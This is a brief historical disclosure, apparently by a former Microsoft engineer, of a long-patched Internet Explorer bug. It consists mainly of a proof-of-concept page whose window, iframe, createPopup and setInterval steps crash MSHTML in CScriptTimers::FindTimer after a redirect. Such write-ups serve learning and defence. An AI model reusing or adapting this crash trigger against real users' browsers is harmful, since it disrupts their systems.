Opening a new window that would soon redirect, injecting an iframe into it, calling createPopup from that iframe, and then calling setInterval from the popup’s window caused a crash once the redirect completed.
<script>
var win; // handle to the window or dialog opened by the button handlers; main() injects into it
function openRegularWindow() {
  // Open the page that redirects to another site about a second later,
  // then run the injection steps against the new window while it is
  // still alive.
  win = window.open("redir.aspx");
  main();
}
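function openModelessWindow() {
  // Same setup as openRegularWindow, but the target is a modeless dialog
  // (IE-only showModelessDialog). The dialog is blurred two seconds later.
  // A function callback replaces the original string argument to
  // setTimeout, so no code is re-parsed from text when the timer fires;
  // it still resolves the shared global `win` at fire time.
  win = showModelessDialog("redir.aspx", window, "dialogwidth=100px;dialogHeight=100px");
  setTimeout(function () {
    win.blur();
  }, 2000);
  main();
}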
function main() {
  // Inject an iframe into the target window, then schedule a script that
  // runs inside that window's realm: it asks the first frame (window[0],
  // i.e. the iframe just injected) for a popup, shows it, and starts an
  // interval on the popup's own window.
  // The script stays a string on purpose: win.setTimeout evaluates it
  // with win's globals, so window[0] refers to a frame of win, not of the
  // opener.
  var frame = win.document.createElement("iframe");
  win.document.appendChild(frame);
  var popupScript = [
    'cp = window[0].createPopup();',
    'cp.show(0, 0, 1, 1);',
    'cp.document.parentWindow.setInterval("alert(\\"Click OK. Next alert will crash the Browser.\\")", 1000);'
  ].join('');
  // Once the ~1s redirect tears down the window that owns the popup, the
  // interval's owner is gone; MSHTML then faulted in
  // CScriptTimers::FindTimer when the timer fired (a lookup against an
  // invalidated owning window).
  win.setTimeout(popupScript);
}
</script>
<input type="button" onclick="openRegularWindow()" value="CrashMe using a regular window" />
<input type="button" onclick="openModelessWindow()" value="CrashMe using a modeless" />
The fault occurred in MSHTML!CScriptTimers::FindTimer when the timer fired after the redirect had invalidated the popup’s owning window.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.